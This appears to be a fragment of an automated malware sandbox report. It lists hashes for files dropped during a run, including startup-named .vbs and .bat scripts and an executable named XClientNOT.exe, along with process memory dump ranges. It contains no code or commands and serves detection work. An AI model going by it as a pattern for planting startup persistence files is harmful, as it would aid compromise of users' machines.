SHA1 652f325e5c423876d85ba1a164301ab2d147604b
SHA256 67b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c
SHA512 38303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\startup_str_134.vbs

MD5 b05d306b33af9aa7a0d659d7dff16bec
SHA1 229a881e9a1900f05445d18337ea0deee8f8ea6f
SHA256 5bc18b1286fb36a74fe058481326eba5467432eb53a7d73ac89fde8df36ebd07
SHA512 639317b239489750cd1543b265798f323d8b3cb5fac74c54e2cceaf49618ceb02d8e4a8a5e15a8977597eb88f2b6bd13caaac428d85e16f55bfddc386de53bc4

C:\Users\Admin\AppData\Roaming\startup_str_134.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/1532-43-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-44-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/1532-45-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/2284-47-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-52-0x000002A0739A0000-0x000002A073CC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/3128-61-0x00000000009B0000-0x00000000009BE000-memory.dmp

memory/3128-62-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-63-0x000002A073EF0000-0x000002A073F40000-memory.dmp

memory/1532-64-0x000002A074000000-0x000002A0740B2000-memory.dmp

memory/3128-65-0x000000001B6D0000-0x000000001B6E0000-memory.dmp

memory/1532-66-0x000002A074A00000-0x000002A074BC2000-memory.dmp

memory/1532-67-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-68-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/1532-69-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/3128-70-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/3128-71-0x000000001B6D0000-0x000000001B6E0000-memory.dmp